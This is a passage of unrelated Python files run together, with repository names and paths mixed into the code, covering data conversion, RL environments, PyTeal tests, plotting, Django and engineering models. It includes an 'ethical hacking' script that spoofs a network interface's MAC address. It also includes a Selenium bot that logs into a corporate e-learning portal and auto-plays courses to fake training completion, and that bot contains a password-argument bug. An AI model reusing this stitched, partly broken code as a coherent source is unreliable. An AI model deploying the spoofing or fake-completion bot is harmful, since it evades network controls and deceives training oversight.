if data.explanation: array_expansion_op.explanation = data.explanation array_expansion_op.start_ordinal = data.startOrdinal array_expansion_op.end_ordinal = data.endOrdinal return array_expansion_op @staticmethod def to_data(instance: 'CdmOperationArrayExpansion', res_opt: 'ResolveOptions', options: 'CopyOptions') -> 'OperationArrayExpansion': if not instance: return None obj = OperationArrayExpansion() obj.type = OperationTypeConvertor._operation_type_to_string(CdmOperationType.ARRAY_EXPANSION) obj.explanation = instance.explanation obj.startOrdinal = instance.start_ordinal obj.endOrdinal = instance.end_ordinal return obj workflow/scripts/distance_json_to_table.py1-10 """ Convert a distances JSON into a single table of values. """ import argparse import json import pandas as pd if __name__ == '__main__': parser = argparse.ArgumentParser( description="Convert distances JSON to a data frame", formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument("--json", required=True, help="distances JSON") parser.add_argument("--output", required=True, help="tab-delimited file with frequency per node at the last available timepoint") parser.add_argument("--distance-attribute", required=True, help="name of the distance attribute to export") args = parser.parse_args() # Load distances. with open(args.json, "r") as fh: distances_json = json.load(fh) distances = distances_json["nodes"] # Create one record for each pairwise distance. records = [] for sample, sample_distances in distances.items(): for other_sample, distance in sample_distances[args.distance_attribute].items(): records.append({ "sample": sample, "other_sample": other_sample, "distance": distance }) # Convert records into a data frame. df = pd.DataFrame(records) # Save the table. df.to_csv(args.output, sep="\t", index=False, header=True) yelp_package/dockerfiles/itest/httpdrain/httpdrain.py import datetime import errno import os from wsgiref.simple_server import make_server from pyramid.config import Configurator from pyramid.response import Response DRAIN_FILE = "drain" def drain(request): if not os.path.exists(DRAIN_FILE): with open(DRAIN_FILE, "w+") as f: f.write(str(datetime.datetime.now().timestamp())) return Response(status_int=200) def stop_drain(request): try: os.remove(DRAIN_FILE) return Response(status_int=200) except OSError as e: if e.errno != errno.ENOENT: raise else: return Response(status_int=200) def status_drain(request): if os.path.exists(DRAIN_FILE): return Response(status_int=200) else: return Response(status_int=400) def safe_to_kill(request): if os.path.exists(DRAIN_FILE): with open(DRAIN_FILE) as f: dt = datetime.datetime.fromtimestamp(float(f.read())) delta = datetime.datetime.now() - dt if delta.seconds > 2: return Response(status_int=200) else: return Response(status_int=400) else: return Response(status_int=400) if __name__ == "__main__": with Configurator() as config: config.add_route("drain", "/drain") config.add_route("stop_drain", "/drain/stop") config.add_route("drain_status", "/drain/status") config.add_route("drain_safe_to_kill", "/drain/safe_to_kill") config.add_view(drain, route_name="drain") config.add_view(stop_drain, route_name="stop_drain") config.add_view(status_drain, route_name="drain_status") config.add_view(safe_to_kill, route_name="drain_safe_to_kill") app = config.make_wsgi_app() server = make_server("0.0.0.0", 3000, app) server.serve_forever() jackyhuynh/ethical-hacking-using-python0 #!/usr/bin/env python import subprocess import optparse import re """ This is a security testing of the ifconfig """ # def mac_changer_str(interface, new_mac): # subprocess.call(f"ifconfig {interface} down", shell=True) # disable the MAC address # subprocess.call(f"ifconfig {interface} hw ether {new_mac}", shell=True) # subprocess.call(f"ifconfig {interface} up", shell=True) # enable the mac Address """ This is a more secure version of the above function That can help user prevent code injection More detail on list """ def mac_changer(interface, new_mac): print("[+] Changing MAC Address for " + interface + " to " + new_mac) subprocess.call(["ifconfig", interface, "down"]) # disable the MAC address subprocess.call(["ifconfig", interface, "hw", "ether", new_mac]) subprocess.call(["ifconfig", interface, "up"]) # enable the mac Address """ get user input """ def get_arguments(): parser = optparse.OptionParser() # -i, --interface: to specify the interface/ dest: where store the user input, help="Interface to change its MAC address" parser.add_option("-i", "--interface", dest="interface", help="Interface to change its MAC address") parser.add_option("-m", "--mac", dest="new_mac", help="New MAC address") # methods return 2 set of information (options, arguments) = parser.parse_args() if not options.interface: parser.error("[-] Please specify an interface, use --help for more info") elif not options.new_mac: parser.error("[-] Please specify a new mac, use --help for more info") return options def get_current_mac(interface): ifconfig_result = subprocess.check_output(["ifconfig", interface]) mac_address_search_result = re.search(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", str(ifconfig_result)) if mac_address_search_result: return mac_address_search_result.group(0) else: print("[-]Clould not read MAC address") # get the user input options = get_arguments() current_mac = get_current_mac(options.interface) print("Current MAC = " + str(current_mac)) # interface of the options user input mac_changer(options.interface, options.new_mac) current_mac = get_current_mac(options.interface) if current_mac == options.new_mac: print("[+] MAC was sucessfully change to " + current_mac) else: print("[-] MAC address did not get changed.") import math import torch.nn as nn from ove.utils.models import Sequential from .GeneralModels import BasicBlock class MultipleBasicBlock(nn.Module): def __init__(self): super().__init__() self.block1 = Sequential( nn.Conv2d(437, 128, kernel_size=(7, 7), stride=(1, 1), padding=3, bias=True), nn.ReLU(inplace=True) ) self.block2 = BasicBlock(128, 128, dilation=1, init_modules=True) self.block3 = BasicBlock(128, 128, dilation=1, init_modules=True) self.block4 = BasicBlock(128, 128, dilation=1, init_modules=True) self.block5 = Sequential(nn.Conv2d(128, 3, (3, 3), (1, 1), (1, 1))) for m in self.modules(): if isinstance(m, nn.Conv2d): n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels m.weight.data.normal_(0, math.sqrt(2. / n)) elif isinstance(m, nn.BatchNorm2d): m.weight.data.fill_(1) m.bias.data.zero_() def forward(self, x): x = self.block1(x) x = self.block2(x) x = self.block3(x) x = self.block4(x) x = self.block5(x) return x import pytest import pyteal as pt options = pt.CompileOptions() def test_bytes_base32_no_padding(): for s in ( "ME", "MFRA", "MFRGG", "MFRGGZA", "MFRGGZDF", "7Z5PWO2C6LFNQFGHWKSK5H47IQP5OJW2M3HA2QPXTY3WTNP5NU2MHBW27M", ): expr = pt.Bytes("base32", s) assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock( [pt.TealOp(expr, pt.Op.byte, "base32(" + s + ")")] ) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_base32_padding(): for s in ( "ME======", "MFRA====", "MFRGG===", "MFRGGZA=", "7Z5PWO2C6LFNQFGHWKSK5H47IQP5OJW2M3HA2QPXTY3WTNP5NU2MHBW27M======", ): expr = pt.Bytes("base32", s) assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock( [pt.TealOp(expr, pt.Op.byte, "base32(" + s + ")")] ) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_base32_empty(): expr = pt.Bytes("base32", "") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "base32()")]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_base64(): expr = pt.Bytes("base64", "Zm9vYmE=") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "base64(Zm9vYmE=)")]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_base64_empty(): expr = pt.Bytes("base64", "") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "base64()")]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_base16(): expr = pt.Bytes("base16", "A21212EF") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "0xA21212EF")]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_base16_prefix(): expr = pt.Bytes("base16", "0xA21212EF") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "0xA21212EF")]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_base16_empty(): expr = pt.Bytes("base16", "") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "0x")]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_utf8(): expr = pt.Bytes("hello world") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, '"hello world"')]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_utf8_special_chars(): expr = pt.Bytes("\t \n \r\n \\ \" ' 😀") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock( [ pt.TealOp( expr, pt.Op.byte, '"\\t \\n \\r\\n \\\\ \\" \' \\xf0\\x9f\\x98\\x80"' ) ] ) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_utf8_empty(): expr = pt.Bytes("") assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, '""')]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_raw(): for value in (b"hello world", bytearray(b"hello world")): expr = pt.Bytes(value) assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "0x" + value.hex())]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_raw_empty(): for value in (b"", bytearray(b"")): expr = pt.Bytes(value) assert expr.type_of() == pt.TealType.bytes expected = pt.TealSimpleBlock([pt.TealOp(expr, pt.Op.byte, "0x")]) actual, _ = expr.__teal__(options) assert actual == expected def test_bytes_invalid(): with pytest.raises(pt.TealInputError): pt.Bytes("base16", b"FF") with pytest.raises(pt.TealInputError): pt.Bytes(b"base16", "FF") with pytest.raises(pt.TealInputError): pt.Bytes("base23", "") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "Zm9vYmE=") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "MFRGG====") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "MFRGG==") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "CCCCCC==") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "CCCCCC") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "C=======") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "C") with pytest.raises(pt.TealInputError): pt.Bytes("base32", "=") with pytest.raises(pt.TealInputError): pt.Bytes("base64", "?????") with pytest.raises(pt.TealInputError): pt.Bytes("base16", "7Z5PWO2C6LFNQFGHWKSK5H47IQP5OJW2M3HA2QPXTY3WTNP5NU2MHBW27M") lvisdd/gctshogi-zero import argparse import os import sys import re import statistics import matplotlib.pyplot as plt parser = argparse.ArgumentParser() parser.add_argument('dir', type=str) args = parser.parse_args() def find_all_files(directory): for root, dirs, files in os.walk(directory): for file in files: yield os.path.join(root, file) ptn_rate = re.compile(r"^'(black|white)_rate:.*:(.*)$") kifu_count = 0 rates = [] for filepath in find_all_files(args.dir): rate = {} move_len = 0 toryo = False try: for line in open(filepath, 'r', encoding='utf-8'): line = line.strip() m = ptn_rate.match(line) if m: rate[m.group(1)] = float(m.group(2)) if line[:1] == '+' or line[:1] == '-': move_len += 1 if line == '%TORYO': toryo = True if not toryo or move_len <= 50 or len(rate) < 2 or min(rate.values()) < 3000: os.remove(filepath) else: kifu_count += 1 rates.extend([_ for _ in rate.values()]) except: print("skip -> " + filepath) os.remove(filepath) print('kifu count :', kifu_count) print('rate mean : {}'.format(statistics.mean(rates))) print('rate median : {}'.format(statistics.median(rates))) print('rate max : {}'.format(max(rates))) print('rate min : {}'.format(min(rates))) plt.hist(rates) plt.show()rl/utils/vec_env/subproc_vec_env.py from multiprocessing import Process, Pipe import numpy as np from rl.utils.vec_env import VecEnv, CloudpickleWrapper from gym import spaces def _worker(remote, parent_remote, env_fn_wrapper): parent_remote.close() env = env_fn_wrapper.var() while True: try: cmd, data = remote.recv() if cmd == 'step': observation, reward, done, info = env.step(data) ''' if done: observation = env.reset() ''' remote.send((observation, reward, done, info)) elif cmd == 'reset': observation = env.reset() remote.send(observation) elif cmd == 'render': remote.send(env.render(*data[0], **data[1])) elif cmd == 'close': remote.close() break elif cmd == 'seed': env.seed(data) remote.send(True) elif cmd == 'get_spaces': remote.send((env.observation_space, env.action_space)) elif cmd == 'env_method': method = getattr(env, data[0]) remote.send(method(*data[1], **data[2])) elif cmd == 'get_attr': remote.send(getattr(env, data)) elif cmd == 'set_attr': remote.send(setattr(env, data[0], data[1])) else: raise NotImplementedError except EOFError: break class SubprocVecEnv(VecEnv): """ Creates a multiprocess vectorized wrapper for multiple environments :param env_fns: ([Gym Environment]) Environments to run in subprocesses """ def __init__(self, env_fns): self.waiting = False self.closed = False n_envs = len(env_fns) self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(n_envs)]) self.processes = [ Process(target=_worker, args=(work_remote, remote, CloudpickleWrapper(env_fn))) for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns) ] for process in self.processes: process.daemon = True # if the main process crashes, we should not cause things to hang process.start() for remote in self.work_remotes: remote.close() self.remotes[0].send(('get_spaces', None)) observation_space, action_space = self.remotes[0].recv() self.goal_env = False self.goal_keys = None dummy_env = env_fns[0]() self.dummy_env = dummy_env if hasattr(dummy_env, '_max_episode_steps'): self._max_episode_steps = dummy_env._max_episode_steps if isinstance(observation_space, spaces.Dict): if dummy_env.compute_reward is not None: self.compute_reward = dummy_env.compute_reward if hasattr(dummy_env, 'goal_extraction_function') and dummy_env.goal_extraction_function is not None: self.goal_extraction_function = dummy_env.goal_extraction_function self.goal_env = True self.goal_keys = tuple(observation_space.spaces.keys()) VecEnv.__init__(self, len(env_fns), observation_space, action_space) def step_async(self, actions): for remote, action in zip(self.remotes, actions): remote.send(('step', action)) self.waiting = True def step_wait(self): results = [remote.recv() for remote in self.remotes] self.waiting = False obs, rews, dones, infos = zip(*results) if self.goal_env: obs = {k: np.stack([o[k] for o in obs]) for k in self.goal_keys} else: obs = np.stack(obs) return obs, np.stack(rews), np.stack(dones), infos def reset(self): for remote in self.remotes: remote.send(('reset', None)) obs = [remote.recv() for remote in self.remotes] if self.goal_env: obs = {k: np.stack([o[k] for o in obs]) for k in self.goal_keys} else: obs = np.stack(obs) return obs def seed(self, seeds=None): if seeds is None: seeds = [None for _ in range(self.num_envs)] if isinstance(seeds, int): seeds = [seeds + i for i in range(self.num_envs)] assert len(seeds) == self.num_envs for remote, seed in zip(self.remotes, seeds): remote.send(('seed', seed)) _ = [remote.recv() for remote in self.remotes] def close(self): if self.closed: return if self.waiting: for remote in self.remotes: remote.recv() for remote in self.remotes: remote.send(('close', None)) for process in self.processes: process.join() self.closed = True def render(self, mode='human', *args, **kwargs): for pipe in self.remotes: # gather images from subprocesses # `mode` will be taken into account later pipe.send(('render', (args, {'mode': 'rgb_array', **kwargs}))) imgs = [pipe.recv() for pipe in self.remotes] # Create a big image by tiling images from subprocesses bigimg = tile_images(imgs) if mode == 'human': import cv2 cv2.imshow('vecenv', bigimg[:, :, ::-1]) cv2.waitKey(1) elif mode == 'rgb_array': return bigimg else: raise NotImplementedError def get_images(self): for pipe in self.remotes: pipe.send(('render', {"mode": 'rgb_array'})) imgs = [pipe.recv() for pipe in self.remotes] return imgs def get_attr(self, attr_name, indices=None): """Return attribute from vectorized environment (see base class).""" target_remotes = self._get_target_remotes(indices) for remote in target_remotes: remote.send(('get_attr', attr_name)) return [remote.recv() for remote in target_remotes] def set_attr(self, attr_name, value, indices=None): """Set attribute inside vectorized environments (see base class).""" target_remotes = self._get_target_remotes(indices) for remote in target_remotes: remote.send(('set_attr', (attr_name, value))) for remote in target_remotes: remote.recv() def env_method(self, method_name, *method_args, indices=None, **method_kwargs): """Call instance methods of vectorized environments.""" target_remotes = self._get_target_remotes(indices) for remote in target_remotes: remote.send(('env_method', (method_name, method_args, method_kwargs))) return [remote.recv() for remote in target_remotes] def _get_target_remotes(self, indices): """ Get the connection object needed to communicate with the wanted envs that are in subprocesses. :param indices: (None,int,Iterable) refers to indices of envs. :return: ([multiprocessing.Connection]) Connection object to communicate between processes. """ indices = self._get_indices(indices) return [self.remotes[i] for i in indices] def tile_images(img_nhwc): """ Tile N images into one big PxQ image (P,Q) are chosen to be as close as possible, and if N is square, then P=Q. :param img_nhwc: (list) list or array of images, ndim=4 once turned into array. img nhwc n = batch index, h = height, w = width, c = channel :return: (numpy float) img_HWc, ndim=3 """ img_nhwc = np.asarray(img_nhwc) n_images, height, width, n_channels = img_nhwc.shape # new_height was named H before new_height = int(np.ceil(np.sqrt(n_images))) # new_width was named W before new_width = int(np.ceil(float(n_images) / new_height)) img_nhwc = np.array(list(img_nhwc) + [img_nhwc[0] * 0 for _ in range(n_images, new_height * new_width)]) # img_HWhwc out_image = img_nhwc.reshape(new_height, new_width, height, width, n_channels) # img_HhWwc out_image = out_image.transpose(0, 2, 1, 3, 4) # img_Hh_Ww_c out_image = out_image.reshape(new_height * height, new_width * width, n_channels) return out_image #!/usr/bin/env python from scitools.std import * # A simple contour plot of the peaks function (standard test function): contour(peaks()) figure() # Here we draw 15 red contour lines with double line width: xv, yv = ndgrid(linspace(-3, 3, 51), linspace(-3, 3, 51)) values = xv*exp(-xv**2 - yv**2) contour(xv, yv, values, 15, 'r', linewidth=2) figure() # Draw contour lines with labels at -2, 0, 2, and 5: values = peaks(xv, yv) contour(xv, yv, values, [-2,0,2,5]) figure() # Here we combine a contour plot with a quiver plot # (note: currently not working with the Gnuplot backend): x = y = linspace(-2, 2, 21) xv, yv = ndgrid(x, y) # or meshgrid(x, y, indexing='ij') values = sin(xv)*sin(yv)*exp(-xv**2 - xv**2) dx, dy = gradient(values) contour(xv, yv, values, 10, show=False) hold('on') quiver(xv, yv, dx, dy, 2, show=True) hold('off') figure() # Another example with contour labels: x = linspace(-2,2,201) y = linspace(-1,1,51) xv, yv = ndgrid(x,y) values = sin(3*yv - xv**2 + 1) + cos(2*yv**2 - 2*xv) contour(xv, yv, values, clabels='on') # contour(x,y,values,..) also works figure() # The contourf command draws filled contours: values = peaks(201) contourf(values, 10, caxis=[-20, 20], title='Filled Contour Plot') raw_input('Press Return key to quit: ') kennywj/web_crawler0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys import re import datetime import time import random from selenium import webdriver from selenium.webdriver.common.keys import Keys from selenium.webdriver.common.by import By from selenium.webdriver.common.action_chains import ActionChains from selenium.common.exceptions import ElementNotInteractableException, TimeoutException, NoSuchElementException from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC URL_ELEARNING = 'http://issbg.efoxconn.com/semielearning/#/login' class ELearning(): """This module provides auto-display elearning web page function. """ def __init__(self, username, password, max_window=True, video_timeout=0, change_page_time=1): """[ parameters ] username : user name for the web page password : the max_window : maximum window or minimum window video_timeout : maximum video playback time (seconds) change_page_time : time for change page (seconds) """ self.username = username self.password = password self.max_window = max_window self.delay = 5 self.video_timeout = video_timeout self.change_page_time = change_page_time self._init_variables() def _init_variables(self): self.counter = 0 self.driver = None self.wait = None self.num_category = 0 self.index_category = 0 self.category = None self.num_topic = 0 self.index_topic = 0 self.topic = None def select_category(self): self.category = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'category-title'))) self.category = self.driver.find_elements_by_class_name('category-title') self.num_category = len(self.category) assert self.num_category > 0 # avoid all category self.index_category = random.randint(1, self.num_category - 1) element = self.category[self.index_category] element.click() # if we don't sleep here, we will read the previous total-results time.sleep(5) item = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'total-results'))) self.num_topic = int(re.findall(r'\d+', item.text)[2]) assert self.num_topic > 0 print('[ select category: %s with %d items ]' % (element.text, self.num_topic)) def _select_tab(self, index): x = 0 while x < index: element = self.wait.until(EC.element_to_be_clickable((By.CLASS_NAME, "btn-next"))) element.click() x = x + 1 def select_topic(self): self.index_topic = random.randint(0, self.num_topic - 1) self._select_tab(self.index_topic // 10) topic_xpath = '//div[@class="el-table__body-wrapper"]/table/tbody/tr[{}]/td[1]'.format((self.index_topic % 10) + 1) element = self.wait.until(EC.presence_of_element_located((By.XPATH, topic_xpath))) element.click() print('[ select topic: %s (%d) ]' % (element.text, self.index_topic)) def _play_document(self, number): element = self.driver.find_element_by_class_name('content-container') focus = ActionChains(self.driver).move_to_element(element).click() focus.perform() html = self.driver.find_element_by_tag_name('html') number = number + (number // 2) for _ in range(number): html.send_keys(Keys.PAGE_DOWN) time.sleep(self.change_page_time) html.send_keys(Keys.END) time.sleep(self.change_page_time) html.send_keys(Keys.END) time.sleep(self.change_page_time) def _play_video(self): begin = datetime.datetime.now().timestamp() while True: element = self.driver.find_element_by_xpath("//span[@class='vjs-remaining-time-display']") if element.text == '-0:00': break time.sleep(5) if self.video_timeout > 0: if (datetime.datetime.now().timestamp() - begin) > self.video_timeout: break def play(self): items = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'info-card-file'))) items = self.driver.find_elements_by_class_name('info-card-file') num_item = len(items) for index in range(num_item): item = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'info-card-file'))) item = self.driver.find_elements_by_class_name('info-card-file')[index] print('[ play start: %s ]' % item.text) item.click() time.sleep(5) try: element = self.driver.find_element_by_xpath('//*[@id="buttons"]/a') num_page = int(re.findall(r'\d+', element.text)[1]) print('type document: %s pages' % num_page) self._play_document(num_page) except NoSuchElementException: print('type video') self._play_video() print('[ play end ]') self._previous_page() self._previous_page() def _previous_page(self): element = self.wait.until(EC.element_to_be_clickable((By.CLASS_NAME, 'back-title'))) element.click() time.sleep(1) def open(self): self.driver = webdriver.Chrome() if self.max_window: self.driver.maximize_window() else: self.driver.minimize_window() self.driver.get(URL_ELEARNING) self.wait = WebDriverWait(self.driver, 10) element = self.wait.until(EC.presence_of_element_located((By.XPATH, "//input[@placeholder='帳號']"))) element.send_keys(self.username) element = self.wait.until(EC.presence_of_element_located((By.XPATH, "//input[@placeholder='密碼']"))) element.send_keys(self.password) button = None buttons = self.driver.find_elements_by_css_selector("button") for btn in buttons: if btn.text == '登入': button = btn button.click() def close(self): element = self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '.el-dropdown-link'))) focus = ActionChains(self.driver).move_to_element(element).click() focus.perform() try: element = self.wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '.el-dropdown-menu__item:nth-child(2)'))) element.click() element = self.wait.until(EC.element_to_be_clickable((By.XPATH, "//div[@class='el-message-box__btns']/button[2]"))) element.click() except (ElementNotInteractableException, TimeoutException): print('Close page without logout.') self.driver.close() self.driver = None if __name__ == '__main__': if len(sys.argv) != 6: sys.exit() username = sys.argv[1] password = [2] number = int(sys.argv[3]) max_window = True video_timeout = int(sys.argv[4]) change_page_time = int(sys.argv[5]) web = ELearning(username, password, max_window, video_timeout, change_page_time) web.open() for _ in range(number): web.select_category() web.select_topic() web.play() time.sleep(3) web.close() print('bye bye') from typing import List import numpy as np from scipy import stats def calculate_correlation(x: List[float], y: List[float]): assert len(x) == len(y) return np.corrcoef(x, y)[0][1], stats.ttest_ind(x, y)[1] Sherba/AdventureReader # Generated by Django 3.0.8 on 2020-07-20 22:02 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('stories', '0010_auto_20200721_0000'), ] operations = [ migrations.AlterField( model_name='post', name='genres', field=models.ManyToManyField(blank=True, to='stories.Genre'), ), ] 1-10 from collections import OrderedDict import time from ._base import Base class IsSensor(Base): def __init__(self, yaq_client, *, name=None): super().__init__(yaq_client, name=name) status = self.trigger() # need to run once to get channel information while not status.done: time.sleep(0.01) self._yaq_channel_names = self.yaq_client.get_channel_names() self._yaq_channel_units = self.yaq_client.get_channel_units() self._yaq_channel_shapes = self.yaq_client.get_channel_shapes() def _describe(self, out): out = super()._describe(out) for name in self._yaq_channel_names: meta = OrderedDict() meta["shape"] = tuple(self._yaq_channel_shapes.get(name, ())) meta["dtype"] = "array" if meta["shape"] else "number" meta["units"] = self._yaq_channel_units.get(name) out[f"{self.name}_{name}"] = OrderedDict(self._field_metadata, **meta) return out @property def hints(self): out = super().hints out["fields"] += [f"{self.name}_{n}" for n in self._yaq_channel_names] return out def _read(self, out, ts) -> OrderedDict: out = super()._read(out, ts) measured = self.yaq_client.get_measured() # locked by behavior of super().read for name in self._yaq_channel_names: out[f"{self.name}_{name}"] = {"value": measured[name], "timestamp": ts} return out 1-10 from __future__ import print_function from . import zeek import traceback import sys class Event(zeek.Event): warnings_emitted = set() def __new__(cls, *args, **kwargs): stack_info = traceback.extract_stack()[0] usage_file = stack_info[0] usage_line = stack_info[1] usage_text = stack_info[3] if (usage_file, usage_line) not in Event.warnings_emitted: print('File "{}", line {}: deprecated bro.event usage,' ' use zeek.Event instead:\n {}'.format( usage_file, usage_line, usage_text), file=sys.stderr) Event.warnings_emitted.add((usage_file, usage_line)) return super(Event, cls).__new__(cls, *args, **kwargs) src/webex-teams/list-people.py # Fill in this file with the people listing code from the Webex Teams exercise import os import os.path import csv import sys import copy import re import numpy as np from numpy import sqrt,log,pi,cos,arctan import scipy.optimize import scipy as sp import scipy.interpolate #if __name__=="__main__": # from matplotlib import pyplot as pl # pl.rc('text', usetex=True) # Support greek letters in plot legend # pass class ModeI_crack_model(object): # abstract class # # Implementations should define: # * methods: # * eval_sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext(self,a) # * evaluate_ModeI_COD_vectorized(self,sigma_applied,x,xt) # should be vectorized over x (not necessarily xt) pass class ModeI_Beta_COD_Formula(ModeI_crack_model): """This represents a crack model where we are given a formula for K_I of the form K_I = sigma*sqrt(pi*a*beta), and COD is a function u(object,surface_position,surface_length). You can add member variables (which will be accessible from the u function) by providing them as keyword arguments to the constructor. At minimum you must provide a function: u(object,surface_position,surface_length) which should be vectorized over surface position, and a function beta(object), which return the COD and beta values respectively. (beta is a function, so you can set it up so that the crack model will work correctly if its attribute parameters are updated) """ u_per_unit_stress=None beta=None def __init__(self,**kwargs): if "u_per_unit_stress" not in kwargs: raise ValueError("Must provide COD function u_per_unit_stress(object,surface_position,surface_length)") if "beta" not in kwargs: raise ValueError("Must provide K coefficient beta(object)") for kwarg in kwargs: setattr(self,kwarg,kwargs[kwarg]) pass pass def eval_sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext(self,a): # For a mode I crack with the tip at the origin, intact material # to the right (x > 0), broken material to the left (x < 0) # The tensile stress @ theta=0 multiplied by sqrt(x)/(sqrt(a)*sigmaext) # where x ( > 0) is the position where the stress is measured, # a is the (half) length of the crack, and sigmaext # is the external tensile load # Per Suresh (9.43 and 9.44a) and Anderson (table 2.1) # and based on K_I=(sigma_ext*sqrt(pi*a*beta)) # instead of K_I=(sigma_ext*sqrt(pi*a)) sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = sqrt(self.beta(self))/sqrt(2.0) return sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext def eval_ModeI_COD_per_unit_stress_vectorized(self,x,xt): return self.u_per_unit_stress(self,x,xt) pass class ModeI_Beta_WeightFunction(ModeI_crack_model): """This represents a crack model where we are given a weight function weightfun_times_sqrt_aminx(object, x,a) representing the weight function m(x,a) multiplied by sqrt(a-x) You can add member variables (which will be accessible from the u function) by providing them as keyword arguments to the constructor. Does NOT assume the weight function is nondimensionalizable, so the weight function can have dimensional parameters NOTE: Do not change internal parameters after construction if using the surrogate, because the surrogate won't be updated! """ # Settable parameters weightfun_times_sqrt_aminx=None epsx=None Eeff = None # = E for plane stress, = E/(1-nu^2) for plane strain surrogate_a = None # Range of crack lengths used for surrogate use_surrogate=None plot_surrogate=None # These are lambdas set by the constructor K_I_ov_sigma_ext_vect=None K_I_ov_sigma_ext_surrogate=None K_I_ov_sigma_ext_use=None def __init__(self,**kwargs): self.use_surrogate=False self.plot_surrogate=False if "weightfun_times_sqrt_aminx" not in kwargs: raise ValueError("Must provide singularity-compensated weight function weightfun_time_sqrt_aminx(object,x,a)") if "epsx" not in kwargs: raise ValueError("Must provide epsilon_x representing the size of the small analytically integrated region around the tip singularity") if "Eeff" not in kwargs: raise ValueError("Must provide Eeff (effective modulus)") for kwarg in kwargs: setattr(self,kwarg,kwargs[kwarg]) pass # Create K_I_ov_sigma_ext_vec and its surrogate K_I_ov_sigma_ext = lambda a : scipy.integrate.quad(lambda u : self.weightfun_times_sqrt_aminx(self,u,a)/np.sqrt(a-u),-a,a-self.epsx)[0] + self.weightfun_times_sqrt_aminx(self,a,a)*2.0*sqrt(self.epsx) self.K_I_ov_sigma_ext_vect = np.vectorize(K_I_ov_sigma_ext) self.K_I_ov_sigma_ext_use = self.K_I_ov_sigma_ext_vect # overridden by self.use_surrogate below if self.use_surrogate or self.plot_surrogate: # simple splrep surrogate K_I_ov_sigma_ext_eval=self.K_I_ov_sigma_ext_vect(self.surrogate_a) (t1,c1,k1) = sp.interpolate.splrep(self.surrogate_a,K_I_ov_sigma_ext_eval) self.K_I_ov_sigma_ext_surrogate = lambda a: sp.interpolate.splev(a,(t1,c1,k1),ext=2) surrogate_a_fine=np.linspace(self.surrogate_a[0],self.surrogate_a[-1],self.surrogate_a.shape[0]*4) if self.plot_surrogate: from matplotlib import pyplot as pl pl.figure() pl.plot(surrogate_a_fine,self.K_I_ov_sigma_ext_vect(surrogate_a_fine),'-', surrogate_a_fine,self.K_I_ov_sigma_ext_surrogate(surrogate_a_fine),'-') pl.title("K$_I$ over sigma$_{ext}$") pl.legend(("Direct","Surrogate")) pass if self.use_surrogate: self.K_I_ov_sigma_ext_use = self.K_I_ov_sigma_ext_surrogate pass pass pass def eval_sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext(self,a): # sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = ([ integral_-a^(a-epsilon) M(x,a)/sqrt(a-x) dx + M(a,a)*2sqrt(epsilon) ] / sqrt(2*pi)) sigmaI_theta0_times_rootr_over_sqrt_a_over_sigmaext = (scipy.integrate.quad(lambda x: self.weightfun_times_sqrt_aminx(self,x,a)/np.sqrt(a-x),-a,a-self.epsx)[0] + self.weightfun_times_sqrt_aminx(self,a,a)*2.0*np.sqrt(self.epsx)) / (np.sqrt(2*pi*a)) # unit check: (should be unitless) # Integral of stress*weight function*dx = SIF (i.e. stress*sqrt(meters)) # units of weight function = 1/sqrt(meters) # units of weightfun_times_sqrt_aminx = unitless # Units of 